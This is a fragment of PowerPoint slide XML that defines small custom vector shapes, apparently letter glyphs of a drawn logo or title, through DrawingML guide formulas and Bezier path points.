                <a:ext cx="34925" cy="38100"/>
              </a:xfrm>
              <a:custGeom>
                <a:avLst/>
                <a:gdLst>
                  <a:gd name="T0" fmla="*/ 0 w 17"/>
                  <a:gd name="T1" fmla="*/ 19 h 19"/>
                  <a:gd name="T2" fmla="*/ 0 w 17"/>
                  <a:gd name="T3" fmla="*/ 0 h 19"/>
                  <a:gd name="T4" fmla="*/ 4 w 17"/>
                  <a:gd name="T5" fmla="*/ 0 h 19"/>
                  <a:gd name="T6" fmla="*/ 11 w 17"/>
                  <a:gd name="T7" fmla="*/ 1 h 19"/>
                  <a:gd name="T8" fmla="*/ 15 w 17"/>
                  <a:gd name="T9" fmla="*/ 4 h 19"/>
                  <a:gd name="T10" fmla="*/ 17 w 17"/>
                  <a:gd name="T11" fmla="*/ 10 h 19"/>
                  <a:gd name="T12" fmla="*/ 15 w 17"/>
                  <a:gd name="T13" fmla="*/ 15 h 19"/>
                  <a:gd name="T14" fmla="*/ 12 w 17"/>
                  <a:gd name="T15" fmla="*/ 18 h 19"/>
                  <a:gd name="T16" fmla="*/ 6 w 17"/>
                  <a:gd name="T17" fmla="*/ 19 h 19"/>
                  <a:gd name="T18" fmla="*/ 0 w 17"/>
                  <a:gd name="T19" fmla="*/ 19 h 19"/>
                  <a:gd name="T20" fmla="*/ 2 w 17"/>
                  <a:gd name="T21" fmla="*/ 18 h 19"/>
                  <a:gd name="T22" fmla="*/ 4 w 17"/>
                  <a:gd name="T23" fmla="*/ 18 h 19"/>
                  <a:gd name="T24" fmla="*/ 10 w 17"/>
                  <a:gd name="T25" fmla="*/ 17 h 19"/>
                  <a:gd name="T26" fmla="*/ 13 w 17"/>
                  <a:gd name="T27" fmla="*/ 14 h 19"/>
                  <a:gd name="T28" fmla="*/ 15 w 17"/>
                  <a:gd name="T29" fmla="*/ 10 h 19"/>
                  <a:gd name="T30" fmla="*/ 13 w 17"/>
                  <a:gd name="T31" fmla="*/ 5 h 19"/>
                  <a:gd name="T32" fmla="*/ 10 w 17"/>
                  <a:gd name="T33" fmla="*/ 2 h 19"/>
                  <a:gd name="T34" fmla="*/ 3 w 17"/>
                  <a:gd name="T35" fmla="*/ 2 h 19"/>
                  <a:gd name="T36" fmla="*/ 2 w 17"/>
                  <a:gd name="T37" fmla="*/ 2 h 19"/>
                  <a:gd name="T38" fmla="*/ 2 w 17"/>
                  <a:gd name="T3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19">
                    <a:moveTo>
                      <a:pt x="0" y="19"/>
                    </a:moveTo>
                    <a:cubicBezTo>
                      <a:pt x="0" y="0"/>
                      <a:pt x="0" y="0"/>
                      <a:pt x="0" y="0"/>
                    </a:cubicBezTo>
                    <a:cubicBezTo>
                      <a:pt x="4" y="0"/>
                      <a:pt x="4" y="0"/>
                      <a:pt x="4" y="0"/>
                    </a:cubicBezTo>
                    <a:cubicBezTo>
                      <a:pt x="7" y="0"/>
                      <a:pt x="9" y="0"/>
                      <a:pt x="11" y="1"/>
                    </a:cubicBezTo>
                    <a:cubicBezTo>
                      <a:pt x="13" y="1"/>
                      <a:pt x="14" y="2"/>
                      <a:pt x="15" y="4"/>
                    </a:cubicBezTo>
                    <a:cubicBezTo>
                      <a:pt x="16" y="6"/>
                      <a:pt x="17" y="8"/>
                      <a:pt x="17" y="10"/>
                    </a:cubicBezTo>
                    <a:cubicBezTo>
                      <a:pt x="17" y="12"/>
                      <a:pt x="16" y="14"/>
                      <a:pt x="15" y="15"/>
                    </a:cubicBezTo>
                    <a:cubicBezTo>
                      <a:pt x="15" y="17"/>
                      <a:pt x="13" y="18"/>
                      <a:pt x="12" y="18"/>
                    </a:cubicBezTo>
                    <a:cubicBezTo>
                      <a:pt x="11" y="19"/>
                      <a:pt x="9" y="19"/>
                      <a:pt x="6" y="19"/>
                    </a:cubicBezTo>
                    <a:lnTo>
                      <a:pt x="0" y="19"/>
                    </a:lnTo>
                    <a:close/>
                    <a:moveTo>
                      <a:pt x="2" y="18"/>
                    </a:moveTo>
                    <a:cubicBezTo>
                      <a:pt x="4" y="18"/>
                      <a:pt x="4" y="18"/>
                      <a:pt x="4" y="18"/>
                    </a:cubicBezTo>
                    <a:cubicBezTo>
                      <a:pt x="7" y="18"/>
                      <a:pt x="9" y="17"/>
                      <a:pt x="10" y="17"/>
                    </a:cubicBezTo>
                    <a:cubicBezTo>
                      <a:pt x="11" y="17"/>
                      <a:pt x="13" y="16"/>
                      <a:pt x="13" y="14"/>
                    </a:cubicBezTo>
                    <a:cubicBezTo>
                      <a:pt x="14" y="13"/>
                      <a:pt x="15" y="12"/>
                      <a:pt x="15" y="10"/>
                    </a:cubicBezTo>
                    <a:cubicBezTo>
                      <a:pt x="15" y="8"/>
                      <a:pt x="14" y="6"/>
                      <a:pt x="13" y="5"/>
                    </a:cubicBezTo>
                    <a:cubicBezTo>
                      <a:pt x="12" y="4"/>
                      <a:pt x="11" y="3"/>
                      <a:pt x="10" y="2"/>
                    </a:cubicBezTo>
                    <a:cubicBezTo>
                      <a:pt x="8" y="2"/>
                      <a:pt x="6" y="2"/>
                      <a:pt x="3" y="2"/>
                    </a:cubicBezTo>
                    <a:cubicBezTo>
                      <a:pt x="2" y="2"/>
                      <a:pt x="2" y="2"/>
                      <a:pt x="2" y="2"/>
                    </a:cubicBez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53"/>
              <p:cNvSpPr>
                <a:spLocks/>
              </p:cNvSpPr>
              <p:nvPr userDrawn="1"/>
            </p:nvSpPr>
            <p:spPr bwMode="auto">
              <a:xfrm>
                <a:off x="5738813" y="1263650"/>
                <a:ext cx="28575" cy="38100"/>
              </a:xfrm>
              <a:custGeom>
                <a:avLst/>
                <a:gdLst>
                  <a:gd name="T0" fmla="*/ 0 w 18"/>
                  <a:gd name="T1" fmla="*/ 0 h 24"/>
                  <a:gd name="T2" fmla="*/ 3 w 18"/>
                  <a:gd name="T3" fmla="*/ 0 h 24"/>
                  <a:gd name="T4" fmla="*/ 9 w 18"/>
                  <a:gd name="T5" fmla="*/ 10 h 24"/>
                  <a:gd name="T6" fmla="*/ 16 w 18"/>
                  <a:gd name="T7" fmla="*/ 0 h 24"/>
                  <a:gd name="T8" fmla="*/ 18 w 18"/>
                  <a:gd name="T9" fmla="*/ 0 h 24"/>
                  <a:gd name="T10" fmla="*/ 11 w 18"/>
                  <a:gd name="T11" fmla="*/ 13 h 24"/>
                  <a:gd name="T12" fmla="*/ 11 w 18"/>
                  <a:gd name="T13" fmla="*/ 24 h 24"/>
                  <a:gd name="T14" fmla="*/ 8 w 18"/>
                  <a:gd name="T15" fmla="*/ 24 h 24"/>
                  <a:gd name="T16" fmla="*/ 8 w 18"/>
                  <a:gd name="T17" fmla="*/ 13 h 24"/>
                  <a:gd name="T18" fmla="*/ 0 w 18"/>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4">
                    <a:moveTo>
                      <a:pt x="0" y="0"/>
                    </a:moveTo>
                    <a:lnTo>
                      <a:pt x="3" y="0"/>
                    </a:lnTo>
                    <a:lnTo>
                      <a:pt x="9" y="10"/>
                    </a:lnTo>
                    <a:lnTo>
                      <a:pt x="16" y="0"/>
                    </a:lnTo>
                    <a:lnTo>
                      <a:pt x="18" y="0"/>
                    </a:lnTo>
                    <a:lnTo>
                      <a:pt x="11" y="13"/>
                    </a:lnTo>
                    <a:lnTo>
                      <a:pt x="11" y="24"/>
                    </a:lnTo>
                    <a:lnTo>
                      <a:pt x="8" y="24"/>
                    </a:lnTo>
                    <a:lnTo>
                      <a:pt x="8" y="1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54"/>
              <p:cNvSpPr>
                <a:spLocks noEditPoints="1"/>
              </p:cNvSpPr>
              <p:nvPr userDrawn="1"/>
            </p:nvSpPr>
            <p:spPr bwMode="auto">
              <a:xfrm>
                <a:off x="5368925" y="1108075"/>
                <a:ext cx="23813" cy="38100"/>
              </a:xfrm>
              <a:custGeom>
                <a:avLst/>
                <a:gdLst>
                  <a:gd name="T0" fmla="*/ 0 w 12"/>
                  <a:gd name="T1" fmla="*/ 0 h 19"/>
                  <a:gd name="T2" fmla="*/ 4 w 12"/>
                  <a:gd name="T3" fmla="*/ 0 h 19"/>
                  <a:gd name="T4" fmla="*/ 8 w 12"/>
                  <a:gd name="T5" fmla="*/ 0 h 19"/>
                  <a:gd name="T6" fmla="*/ 11 w 12"/>
                  <a:gd name="T7" fmla="*/ 2 h 19"/>
                  <a:gd name="T8" fmla="*/ 12 w 12"/>
                  <a:gd name="T9" fmla="*/ 5 h 19"/>
                  <a:gd name="T10" fmla="*/ 11 w 12"/>
                  <a:gd name="T11" fmla="*/ 8 h 19"/>
                  <a:gd name="T12" fmla="*/ 8 w 12"/>
                  <a:gd name="T13" fmla="*/ 10 h 19"/>
                  <a:gd name="T14" fmla="*/ 3 w 12"/>
                  <a:gd name="T15" fmla="*/ 10 h 19"/>
                  <a:gd name="T16" fmla="*/ 2 w 12"/>
                  <a:gd name="T17" fmla="*/ 10 h 19"/>
                  <a:gd name="T18" fmla="*/ 2 w 12"/>
                  <a:gd name="T19" fmla="*/ 19 h 19"/>
                  <a:gd name="T20" fmla="*/ 0 w 12"/>
                  <a:gd name="T21" fmla="*/ 19 h 19"/>
                  <a:gd name="T22" fmla="*/ 0 w 12"/>
                  <a:gd name="T23" fmla="*/ 0 h 19"/>
                  <a:gd name="T24" fmla="*/ 2 w 12"/>
                  <a:gd name="T25" fmla="*/ 2 h 19"/>
                  <a:gd name="T26" fmla="*/ 2 w 12"/>
                  <a:gd name="T27" fmla="*/ 8 h 19"/>
                  <a:gd name="T28" fmla="*/ 5 w 12"/>
                  <a:gd name="T29" fmla="*/ 8 h 19"/>
                  <a:gd name="T30" fmla="*/ 8 w 12"/>
                  <a:gd name="T31" fmla="*/ 8 h 19"/>
                  <a:gd name="T32" fmla="*/ 9 w 12"/>
                  <a:gd name="T33" fmla="*/ 7 h 19"/>
                  <a:gd name="T34" fmla="*/ 10 w 12"/>
                  <a:gd name="T35" fmla="*/ 5 h 19"/>
                  <a:gd name="T36" fmla="*/ 9 w 12"/>
                  <a:gd name="T37" fmla="*/ 3 h 19"/>
                  <a:gd name="T38" fmla="*/ 8 w 12"/>
                  <a:gd name="T39" fmla="*/ 2 h 19"/>
                  <a:gd name="T40" fmla="*/ 5 w 12"/>
                  <a:gd name="T41" fmla="*/ 2 h 19"/>
                  <a:gd name="T42" fmla="*/ 2 w 12"/>
                  <a:gd name="T43"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19">
                    <a:moveTo>
                      <a:pt x="0" y="0"/>
                    </a:moveTo>
                    <a:cubicBezTo>
                      <a:pt x="4" y="0"/>
                      <a:pt x="4" y="0"/>
                      <a:pt x="4" y="0"/>
                    </a:cubicBezTo>
                    <a:cubicBezTo>
                      <a:pt x="6" y="0"/>
                      <a:pt x="7" y="0"/>
                      <a:pt x="8" y="0"/>
                    </a:cubicBezTo>
                    <a:cubicBezTo>
                      <a:pt x="9" y="0"/>
                      <a:pt x="10" y="1"/>
                      <a:pt x="11" y="2"/>
                    </a:cubicBezTo>
                    <a:cubicBezTo>
                      <a:pt x="12" y="3"/>
                      <a:pt x="12" y="4"/>
                      <a:pt x="12" y="5"/>
                    </a:cubicBezTo>
                    <a:cubicBezTo>
                      <a:pt x="12" y="6"/>
                      <a:pt x="12" y="7"/>
                      <a:pt x="11" y="8"/>
                    </a:cubicBezTo>
                    <a:cubicBezTo>
                      <a:pt x="10" y="9"/>
                      <a:pt x="9" y="10"/>
                      <a:pt x="8" y="10"/>
                    </a:cubicBezTo>
                    <a:cubicBezTo>
                      <a:pt x="7" y="10"/>
                      <a:pt x="6" y="10"/>
                      <a:pt x="3" y="10"/>
                    </a:cubicBezTo>
                    <a:cubicBezTo>
                      <a:pt x="2" y="10"/>
                      <a:pt x="2" y="10"/>
                      <a:pt x="2" y="10"/>
                    </a:cubicBezTo>
                    <a:cubicBezTo>
                      <a:pt x="2" y="19"/>
                      <a:pt x="2" y="19"/>
                      <a:pt x="2" y="19"/>
                    </a:cubicBezTo>
                    <a:cubicBezTo>
                      <a:pt x="0" y="19"/>
                      <a:pt x="0" y="19"/>
                      <a:pt x="0" y="19"/>
                    </a:cubicBezTo>
                    <a:lnTo>
                      <a:pt x="0" y="0"/>
                    </a:lnTo>
                    <a:close/>
                    <a:moveTo>
                      <a:pt x="2" y="2"/>
                    </a:moveTo>
                    <a:cubicBezTo>
                      <a:pt x="2" y="8"/>
                      <a:pt x="2" y="8"/>
                      <a:pt x="2" y="8"/>
                    </a:cubicBezTo>
                    <a:cubicBezTo>
                      <a:pt x="5" y="8"/>
                      <a:pt x="5" y="8"/>
                      <a:pt x="5" y="8"/>
                    </a:cubicBezTo>
                    <a:cubicBezTo>
                      <a:pt x="6" y="8"/>
                      <a:pt x="7" y="8"/>
                      <a:pt x="8" y="8"/>
                    </a:cubicBezTo>
                    <a:cubicBezTo>
                      <a:pt x="9" y="8"/>
                      <a:pt x="9" y="7"/>
                      <a:pt x="9" y="7"/>
                    </a:cubicBezTo>
                    <a:cubicBezTo>
                      <a:pt x="10" y="6"/>
                      <a:pt x="10" y="6"/>
                      <a:pt x="10" y="5"/>
                    </a:cubicBezTo>
                    <a:cubicBezTo>
                      <a:pt x="10" y="4"/>
                      <a:pt x="10" y="4"/>
                      <a:pt x="9" y="3"/>
                    </a:cubicBezTo>
                    <a:cubicBezTo>
                      <a:pt x="9" y="3"/>
                      <a:pt x="9" y="2"/>
                      <a:pt x="8" y="2"/>
                    </a:cubicBezTo>
                    <a:cubicBezTo>
                      <a:pt x="7" y="2"/>
                      <a:pt x="6" y="2"/>
                      <a:pt x="5" y="2"/>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55"/>
              <p:cNvSpPr>
                <a:spLocks/>
              </p:cNvSpPr>
              <p:nvPr userDrawn="1"/>
            </p:nvSpPr>
            <p:spPr bwMode="auto">
              <a:xfrm>
                <a:off x="5400675" y="1108075"/>
                <a:ext cx="23813" cy="38100"/>
              </a:xfrm>
              <a:custGeom>
                <a:avLst/>
                <a:gdLst>
                  <a:gd name="T0" fmla="*/ 0 w 15"/>
                  <a:gd name="T1" fmla="*/ 0 h 24"/>
                  <a:gd name="T2" fmla="*/ 15 w 15"/>
                  <a:gd name="T3" fmla="*/ 0 h 24"/>
                  <a:gd name="T4" fmla="*/ 15 w 15"/>
                  <a:gd name="T5" fmla="*/ 2 h 24"/>
                  <a:gd name="T6" fmla="*/ 3 w 15"/>
                  <a:gd name="T7" fmla="*/ 2 h 24"/>
                  <a:gd name="T8" fmla="*/ 3 w 15"/>
                  <a:gd name="T9" fmla="*/ 10 h 24"/>
                  <a:gd name="T10" fmla="*/ 15 w 15"/>
                  <a:gd name="T11" fmla="*/ 10 h 24"/>
                  <a:gd name="T12" fmla="*/ 15 w 15"/>
                  <a:gd name="T13" fmla="*/ 12 h 24"/>
                  <a:gd name="T14" fmla="*/ 3 w 15"/>
                  <a:gd name="T15" fmla="*/ 12 h 24"/>
                  <a:gd name="T16" fmla="*/ 3 w 15"/>
                  <a:gd name="T17" fmla="*/ 22 h 24"/>
                  <a:gd name="T18" fmla="*/ 15 w 15"/>
                  <a:gd name="T19" fmla="*/ 22 h 24"/>
                  <a:gd name="T20" fmla="*/ 15 w 15"/>
                  <a:gd name="T21" fmla="*/ 24 h 24"/>
                  <a:gd name="T22" fmla="*/ 0 w 15"/>
                  <a:gd name="T23" fmla="*/ 24 h 24"/>
                  <a:gd name="T24" fmla="*/ 0 w 15"/>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4">
                    <a:moveTo>
                      <a:pt x="0" y="0"/>
                    </a:moveTo>
                    <a:lnTo>
                      <a:pt x="15" y="0"/>
                    </a:lnTo>
                    <a:lnTo>
                      <a:pt x="15" y="2"/>
                    </a:lnTo>
                    <a:lnTo>
                      <a:pt x="3" y="2"/>
                    </a:lnTo>
                    <a:lnTo>
                      <a:pt x="3" y="10"/>
                    </a:lnTo>
                    <a:lnTo>
                      <a:pt x="15" y="10"/>
                    </a:lnTo>
                    <a:lnTo>
                      <a:pt x="15" y="12"/>
                    </a:lnTo>
                    <a:lnTo>
                      <a:pt x="3" y="12"/>
                    </a:lnTo>
                    <a:lnTo>
                      <a:pt x="3" y="22"/>
                    </a:lnTo>
                    <a:lnTo>
                      <a:pt x="15" y="22"/>
                    </a:lnTo>
                    <a:lnTo>
                      <a:pt x="15" y="24"/>
                    </a:lnTo>
                    <a:lnTo>
                      <a:pt x="0" y="2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56"/>
              <p:cNvSpPr>
                <a:spLocks noEditPoints="1"/>
              </p:cNvSpPr>
              <p:nvPr userDrawn="1"/>
            </p:nvSpPr>
            <p:spPr bwMode="auto">
              <a:xfrm>
                <a:off x="5432425" y="1108075"/>
                <a:ext cx="23813" cy="38100"/>
              </a:xfrm>
              <a:custGeom>
                <a:avLst/>
                <a:gdLst>
                  <a:gd name="T0" fmla="*/ 0 w 12"/>
                  <a:gd name="T1" fmla="*/ 0 h 19"/>
                  <a:gd name="T2" fmla="*/ 4 w 12"/>
                  <a:gd name="T3" fmla="*/ 0 h 19"/>
                  <a:gd name="T4" fmla="*/ 8 w 12"/>
                  <a:gd name="T5" fmla="*/ 0 h 19"/>
                  <a:gd name="T6" fmla="*/ 11 w 12"/>
                  <a:gd name="T7" fmla="*/ 2 h 19"/>
                  <a:gd name="T8" fmla="*/ 12 w 12"/>
                  <a:gd name="T9" fmla="*/ 5 h 19"/>
                  <a:gd name="T10" fmla="*/ 11 w 12"/>
                  <a:gd name="T11" fmla="*/ 8 h 19"/>
                  <a:gd name="T12" fmla="*/ 9 w 12"/>
                  <a:gd name="T13" fmla="*/ 10 h 19"/>
                  <a:gd name="T14" fmla="*/ 5 w 12"/>
                  <a:gd name="T15" fmla="*/ 10 h 19"/>
                  <a:gd name="T16" fmla="*/ 12 w 12"/>
                  <a:gd name="T17" fmla="*/ 19 h 19"/>
                  <a:gd name="T18" fmla="*/ 10 w 12"/>
                  <a:gd name="T19" fmla="*/ 19 h 19"/>
                  <a:gd name="T20" fmla="*/ 3 w 12"/>
                  <a:gd name="T21" fmla="*/ 10 h 19"/>
                  <a:gd name="T22" fmla="*/ 2 w 12"/>
                  <a:gd name="T23" fmla="*/ 10 h 19"/>
                  <a:gd name="T24" fmla="*/ 2 w 12"/>
                  <a:gd name="T25" fmla="*/ 19 h 19"/>
                  <a:gd name="T26" fmla="*/ 0 w 12"/>
                  <a:gd name="T27" fmla="*/ 19 h 19"/>
                  <a:gd name="T28" fmla="*/ 0 w 12"/>
                  <a:gd name="T29" fmla="*/ 0 h 19"/>
                  <a:gd name="T30" fmla="*/ 2 w 12"/>
                  <a:gd name="T31" fmla="*/ 2 h 19"/>
                  <a:gd name="T32" fmla="*/ 2 w 12"/>
                  <a:gd name="T33" fmla="*/ 8 h 19"/>
                  <a:gd name="T34" fmla="*/ 5 w 12"/>
                  <a:gd name="T35" fmla="*/ 8 h 19"/>
                  <a:gd name="T36" fmla="*/ 8 w 12"/>
                  <a:gd name="T37" fmla="*/ 8 h 19"/>
                  <a:gd name="T38" fmla="*/ 9 w 12"/>
                  <a:gd name="T39" fmla="*/ 7 h 19"/>
                  <a:gd name="T40" fmla="*/ 10 w 12"/>
                  <a:gd name="T41" fmla="*/ 5 h 19"/>
                  <a:gd name="T42" fmla="*/ 9 w 12"/>
                  <a:gd name="T43" fmla="*/ 3 h 19"/>
                  <a:gd name="T44" fmla="*/ 8 w 12"/>
                  <a:gd name="T45" fmla="*/ 2 h 19"/>
                  <a:gd name="T46" fmla="*/ 5 w 12"/>
                  <a:gd name="T47" fmla="*/ 2 h 19"/>
                  <a:gd name="T48" fmla="*/ 2 w 12"/>
                  <a:gd name="T49"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 h="19">
                    <a:moveTo>
                      <a:pt x="0" y="0"/>
                    </a:moveTo>
                    <a:cubicBezTo>
                      <a:pt x="4" y="0"/>
                      <a:pt x="4" y="0"/>
                      <a:pt x="4" y="0"/>
                    </a:cubicBezTo>
                    <a:cubicBezTo>
                      <a:pt x="6" y="0"/>
                      <a:pt x="7" y="0"/>
                      <a:pt x="8" y="0"/>
                    </a:cubicBezTo>
                    <a:cubicBezTo>
                      <a:pt x="9" y="0"/>
                      <a:pt x="10" y="1"/>
                      <a:pt x="11" y="2"/>
                    </a:cubicBezTo>
                    <a:cubicBezTo>
                      <a:pt x="12" y="3"/>
                      <a:pt x="12" y="4"/>
                      <a:pt x="12" y="5"/>
                    </a:cubicBezTo>
                    <a:cubicBezTo>
                      <a:pt x="12" y="6"/>
                      <a:pt x="12" y="7"/>
                      <a:pt x="11" y="8"/>
                    </a:cubicBezTo>
                    <a:cubicBezTo>
                      <a:pt x="11" y="9"/>
                      <a:pt x="10" y="9"/>
                      <a:pt x="9" y="10"/>
                    </a:cubicBezTo>
                    <a:cubicBezTo>
                      <a:pt x="8" y="10"/>
                      <a:pt x="7" y="10"/>
                      <a:pt x="5" y="10"/>
                    </a:cubicBezTo>
                    <a:cubicBezTo>
                      <a:pt x="12" y="19"/>
                      <a:pt x="12" y="19"/>
                      <a:pt x="12" y="19"/>
                    </a:cubicBezTo>
                    <a:cubicBezTo>
                      <a:pt x="10" y="19"/>
                      <a:pt x="10" y="19"/>
                      <a:pt x="10" y="19"/>
                    </a:cubicBezTo>
                    <a:cubicBezTo>
                      <a:pt x="3" y="10"/>
                      <a:pt x="3" y="10"/>
                      <a:pt x="3" y="10"/>
                    </a:cubicBezTo>
                    <a:cubicBezTo>
                      <a:pt x="2" y="10"/>
                      <a:pt x="2" y="10"/>
                      <a:pt x="2" y="10"/>
                    </a:cubicBezTo>
                    <a:cubicBezTo>
                      <a:pt x="2" y="19"/>
                      <a:pt x="2" y="19"/>
                      <a:pt x="2" y="19"/>
                    </a:cubicBezTo>
                    <a:cubicBezTo>
                      <a:pt x="0" y="19"/>
                      <a:pt x="0" y="19"/>
                      <a:pt x="0" y="19"/>
                    </a:cubicBezTo>
                    <a:lnTo>
                      <a:pt x="0" y="0"/>
                    </a:lnTo>
                    <a:close/>
                    <a:moveTo>
                      <a:pt x="2" y="2"/>
                    </a:moveTo>
                    <a:cubicBezTo>
                      <a:pt x="2" y="8"/>
                      <a:pt x="2" y="8"/>
                      <a:pt x="2" y="8"/>
                    </a:cubicBezTo>
                    <a:cubicBezTo>
                      <a:pt x="5" y="8"/>
                      <a:pt x="5" y="8"/>
                      <a:pt x="5" y="8"/>
                    </a:cubicBezTo>
                    <a:cubicBezTo>
                      <a:pt x="6" y="8"/>
                      <a:pt x="7" y="8"/>
                      <a:pt x="8" y="8"/>
                    </a:cubicBezTo>
                    <a:cubicBezTo>
                      <a:pt x="8" y="8"/>
                      <a:pt x="9" y="7"/>
                      <a:pt x="9" y="7"/>
                    </a:cubicBezTo>
                    <a:cubicBezTo>
                      <a:pt x="10" y="6"/>
                      <a:pt x="10" y="6"/>
                      <a:pt x="10" y="5"/>
                    </a:cubicBezTo>
                    <a:cubicBezTo>
                      <a:pt x="10" y="4"/>
                      <a:pt x="10" y="4"/>
                      <a:pt x="9" y="3"/>
                    </a:cubicBezTo>
                    <a:cubicBezTo>
                      <a:pt x="9" y="3"/>
                      <a:pt x="9" y="2"/>
                      <a:pt x="8" y="2"/>
                    </a:cubicBezTo>
                    <a:cubicBezTo>
                      <a:pt x="7" y="2"/>
                      <a:pt x="6" y="2"/>
                      <a:pt x="5" y="2"/>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157"/>
              <p:cNvSpPr>
                <a:spLocks noChangeArrowheads="1"/>
              </p:cNvSpPr>
              <p:nvPr userDrawn="1"/>
            </p:nvSpPr>
            <p:spPr bwMode="auto">
              <a:xfrm>
                <a:off x="5464175" y="1108075"/>
                <a:ext cx="4763"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58"/>
              <p:cNvSpPr>
                <a:spLocks noEditPoints="1"/>
              </p:cNvSpPr>
              <p:nvPr userDrawn="1"/>
            </p:nvSpPr>
            <p:spPr bwMode="auto">
              <a:xfrm>
                <a:off x="5475288" y="1104900"/>
                <a:ext cx="42863" cy="42863"/>
              </a:xfrm>
              <a:custGeom>
                <a:avLst/>
                <a:gdLst>
                  <a:gd name="T0" fmla="*/ 11 w 21"/>
                  <a:gd name="T1" fmla="*/ 0 h 21"/>
                  <a:gd name="T2" fmla="*/ 18 w 21"/>
                  <a:gd name="T3" fmla="*/ 3 h 21"/>
                  <a:gd name="T4" fmla="*/ 21 w 21"/>
                  <a:gd name="T5" fmla="*/ 11 h 21"/>
                  <a:gd name="T6" fmla="*/ 18 w 21"/>
                  <a:gd name="T7" fmla="*/ 18 h 21"/>
                  <a:gd name="T8" fmla="*/ 11 w 21"/>
                  <a:gd name="T9" fmla="*/ 21 h 21"/>
                  <a:gd name="T10" fmla="*/ 3 w 21"/>
                  <a:gd name="T11" fmla="*/ 18 h 21"/>
                  <a:gd name="T12" fmla="*/ 0 w 21"/>
                  <a:gd name="T13" fmla="*/ 11 h 21"/>
                  <a:gd name="T14" fmla="*/ 2 w 21"/>
                  <a:gd name="T15" fmla="*/ 5 h 21"/>
                  <a:gd name="T16" fmla="*/ 5 w 21"/>
                  <a:gd name="T17" fmla="*/ 2 h 21"/>
                  <a:gd name="T18" fmla="*/ 11 w 21"/>
                  <a:gd name="T19" fmla="*/ 0 h 21"/>
                  <a:gd name="T20" fmla="*/ 11 w 21"/>
                  <a:gd name="T21" fmla="*/ 2 h 21"/>
                  <a:gd name="T22" fmla="*/ 7 w 21"/>
                  <a:gd name="T23" fmla="*/ 3 h 21"/>
                  <a:gd name="T24" fmla="*/ 4 w 21"/>
                  <a:gd name="T25" fmla="*/ 6 h 21"/>
                  <a:gd name="T26" fmla="*/ 2 w 21"/>
                  <a:gd name="T27" fmla="*/ 11 h 21"/>
                  <a:gd name="T28" fmla="*/ 5 w 21"/>
                  <a:gd name="T29" fmla="*/ 17 h 21"/>
                  <a:gd name="T30" fmla="*/ 11 w 21"/>
                  <a:gd name="T31" fmla="*/ 19 h 21"/>
                  <a:gd name="T32" fmla="*/ 15 w 21"/>
                  <a:gd name="T33" fmla="*/ 18 h 21"/>
                  <a:gd name="T34" fmla="*/ 18 w 21"/>
                  <a:gd name="T35" fmla="*/ 15 h 21"/>
                  <a:gd name="T36" fmla="*/ 19 w 21"/>
                  <a:gd name="T37" fmla="*/ 11 h 21"/>
                  <a:gd name="T38" fmla="*/ 18 w 21"/>
                  <a:gd name="T39" fmla="*/ 6 h 21"/>
                  <a:gd name="T40" fmla="*/ 15 w 21"/>
                  <a:gd name="T41" fmla="*/ 3 h 21"/>
                  <a:gd name="T42" fmla="*/ 11 w 21"/>
                  <a:gd name="T43"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21">
                    <a:moveTo>
                      <a:pt x="11" y="0"/>
                    </a:moveTo>
                    <a:cubicBezTo>
                      <a:pt x="14" y="0"/>
                      <a:pt x="16" y="1"/>
                      <a:pt x="18" y="3"/>
                    </a:cubicBezTo>
                    <a:cubicBezTo>
                      <a:pt x="20" y="5"/>
                      <a:pt x="21" y="8"/>
                      <a:pt x="21" y="11"/>
                    </a:cubicBezTo>
                    <a:cubicBezTo>
                      <a:pt x="21" y="13"/>
                      <a:pt x="20" y="16"/>
                      <a:pt x="18" y="18"/>
                    </a:cubicBezTo>
                    <a:cubicBezTo>
                      <a:pt x="16" y="20"/>
                      <a:pt x="14" y="21"/>
                      <a:pt x="11" y="21"/>
                    </a:cubicBezTo>
                    <a:cubicBezTo>
                      <a:pt x="8" y="21"/>
                      <a:pt x="5" y="20"/>
                      <a:pt x="3" y="18"/>
                    </a:cubicBezTo>
                    <a:cubicBezTo>
                      <a:pt x="1" y="16"/>
                      <a:pt x="0" y="14"/>
                      <a:pt x="0" y="11"/>
                    </a:cubicBezTo>
                    <a:cubicBezTo>
                      <a:pt x="0" y="9"/>
                      <a:pt x="1" y="7"/>
                      <a:pt x="2" y="5"/>
                    </a:cubicBezTo>
                    <a:cubicBezTo>
                      <a:pt x="3" y="4"/>
                      <a:pt x="4" y="3"/>
                      <a:pt x="5" y="2"/>
                    </a:cubicBezTo>
                    <a:cubicBezTo>
                      <a:pt x="7" y="1"/>
                      <a:pt x="9" y="0"/>
                      <a:pt x="11" y="0"/>
                    </a:cubicBezTo>
                    <a:close/>
                    <a:moveTo>
                      <a:pt x="11" y="2"/>
                    </a:moveTo>
                    <a:cubicBezTo>
                      <a:pt x="9" y="2"/>
                      <a:pt x="8" y="3"/>
                      <a:pt x="7" y="3"/>
                    </a:cubicBezTo>
                    <a:cubicBezTo>
                      <a:pt x="5" y="4"/>
                      <a:pt x="4" y="5"/>
                      <a:pt x="4" y="6"/>
                    </a:cubicBezTo>
                    <a:cubicBezTo>
                      <a:pt x="3" y="8"/>
                      <a:pt x="2" y="9"/>
                      <a:pt x="2" y="11"/>
                    </a:cubicBezTo>
                    <a:cubicBezTo>
                      <a:pt x="2" y="13"/>
                      <a:pt x="3" y="15"/>
                      <a:pt x="5" y="17"/>
                    </a:cubicBezTo>
                    <a:cubicBezTo>
                      <a:pt x="6" y="18"/>
                      <a:pt x="8" y="19"/>
                      <a:pt x="11" y="19"/>
                    </a:cubicBezTo>
                    <a:cubicBezTo>
                      <a:pt x="12" y="19"/>
                      <a:pt x="14" y="19"/>
                      <a:pt x="15" y="18"/>
                    </a:cubicBezTo>
                    <a:cubicBezTo>
                      <a:pt x="16" y="17"/>
                      <a:pt x="17" y="16"/>
                      <a:pt x="18" y="15"/>
                    </a:cubicBezTo>
                    <a:cubicBezTo>
                      <a:pt x="19" y="14"/>
                      <a:pt x="19" y="12"/>
                      <a:pt x="19" y="11"/>
                    </a:cubicBezTo>
                    <a:cubicBezTo>
                      <a:pt x="19" y="9"/>
                      <a:pt x="19" y="8"/>
                      <a:pt x="18" y="6"/>
                    </a:cubicBezTo>
                    <a:cubicBezTo>
                      <a:pt x="17" y="5"/>
                      <a:pt x="16" y="4"/>
                      <a:pt x="15" y="3"/>
                    </a:cubicBezTo>
                    <a:cubicBezTo>
                      <a:pt x="14" y="3"/>
                      <a:pt x="12" y="2"/>
                      <a:pt x="1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59"/>
              <p:cNvSpPr>
                <a:spLocks noEditPoints="1"/>
              </p:cNvSpPr>
              <p:nvPr userDrawn="1"/>
            </p:nvSpPr>
